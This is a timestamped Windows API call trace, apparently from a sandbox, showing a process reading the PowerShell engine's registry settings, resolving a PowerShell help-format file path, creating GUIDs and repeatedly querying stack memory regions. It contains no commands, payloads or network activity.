	[0299.755] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x32c) returned 0x0
	[0299.755] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0299.755] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff740
	[0299.755] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x1b6ff740, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0299.756] CoTaskMemFree (pv=0x1b6ff740) 
	[0299.756] RegCloseKey (hKey=0x32c) returned 0x0
	[0299.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0299.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0299.761] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x756a3f78, Data2=0x9e93, Data3=0x49f7, Data4=([0]=0xa0, [1]=0xf6, [2]=0x19, [3]=0xf2, [4]=0x17, [5]=0x47, [6]=0x6b, [7]=0x4a))) returned 0x0
	[0299.761] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf9376397, Data2=0x6f62, Data3=0x4ac5, Data4=([0]=0x91, [1]=0x5f, [2]=0xc5, [3]=0x4e, [4]=0x82, [5]=0x39, [6]=0x97, [7]=0x4c))) returned 0x0
	[0299.775] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5792003d, Data2=0x2127, Data3=0x4bd2, Data4=([0]=0x97, [1]=0x91, [2]=0x81, [3]=0x69, [4]=0x82, [5]=0xb, [6]=0xb, [7]=0xb7))) returned 0x0
	[0299.775] VirtualQuery (in: lpAddress=0x28b0c0, lpBuffer=0x28bf80, dwLength=0x30 | out: lpBuffer=0x28bf80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.775] VirtualQuery (in: lpAddress=0x28b150, lpBuffer=0x28c010, dwLength=0x30 | out: lpBuffer=0x28c010*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.775] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.776] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b500, lpBuffer=0x28c3c0, dwLength=0x30 | out: lpBuffer=0x28c3c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.777] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xaa95b461, Data2=0xe9b, Data3=0x449e, Data4=([0]=0xbe, [1]=0x9b, [2]=0x28, [3]=0x38, [4]=0xd2, [5]=0x6, [6]=0x33, [7]=0xf7))) returned 0x0
	[0299.778] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b8d0, lpBuffer=0x28c790, dwLength=0x30 | out: lpBuffer=0x28c790*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.778] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b500, lpBuffer=0x28c3c0, dwLength=0x30 | out: lpBuffer=0x28c3c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.779] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xee2b6fba, Data2=0x1bf1, Data3=0x4280, Data4=([0]=0xab, [1]=0x75, [2]=0x3, [3]=0x47, [4]=0xd5, [5]=0x43, [6]=0x98, [7]=0xd9))) returned 0x0
	[0299.780] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5c9c63e7, Data2=0x5637, Data3=0x4034, Data4=([0]=0xac, [1]=0x86, [2]=0x7e, [3]=0x6f, [4]=0x1e, [5]=0xcd, [6]=0x14, [7]=0xfe))) returned 0x0
	[0299.780] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.780] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.780] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.780] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.780] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.780] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28af30, lpBuffer=0x28bdf0, dwLength=0x30 | out: lpBuffer=0x28bdf0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28afc0, lpBuffer=0x28be80, dwLength=0x30 | out: lpBuffer=0x28be80*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.781] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b9d0, lpBuffer=0x28c890, dwLength=0x30 | out: lpBuffer=0x28c890*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b0c0, lpBuffer=0x28bf80, dwLength=0x30 | out: lpBuffer=0x28bf80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b150, lpBuffer=0x28c010, dwLength=0x30 | out: lpBuffer=0x28c010*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.782] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b500, lpBuffer=0x28c3c0, dwLength=0x30 | out: lpBuffer=0x28c3c0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.783] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] VirtualQuery (in: lpAddress=0x28b830, lpBuffer=0x28c6f0, dwLength=0x30 | out: lpBuffer=0x28c6f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] VirtualQuery (in: lpAddress=0x28b8c0, lpBuffer=0x28c780, dwLength=0x30 | out: lpBuffer=0x28c780*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.784] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xcd961c48, Data2=0xe2b0, Data3=0x400e, Data4=([0]=0xaf, [1]=0xd, [2]=0x9c, [3]=0xf, [4]=0x5, [5]=0x5a, [6]=0x6c, [7]=0xda))) returned 0x0
	[0299.784] VirtualQuery (in: lpAddress=0x28b0c0, lpBuffer=0x28bf80, dwLength=0x30 | out: lpBuffer=0x28bf80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
